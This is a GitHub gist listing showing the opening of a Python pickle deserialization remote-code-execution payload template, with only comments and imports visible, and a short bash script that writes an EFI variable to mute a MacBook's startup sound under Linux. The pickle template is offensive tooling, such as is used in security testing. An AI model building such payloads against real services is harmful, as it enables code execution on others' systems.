Skip to content

Instantly share code, notes, and snippets.

@mgeeky
mgeeky / pickle-payload.py
Last active July 14, 2025 16:19
Python's Pickle Remote Code Execution payload template.
#!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with command to execute at it's first parameter.
# Otherwise, the default one will be used.
#
import cPickle
import sys
import base64
@0xbb
0xbb / macbook-mute.sh
Last active January 23, 2026 07:37
Turn off Macbook startup sound - Linux
#!/bin/bash
printf "\x07\x00\x00\x00\x00" > /sys/firmware/efi/efivars/SystemAudioVolume-7c436110-ab2a-4bbb-a880-fe41995c9f82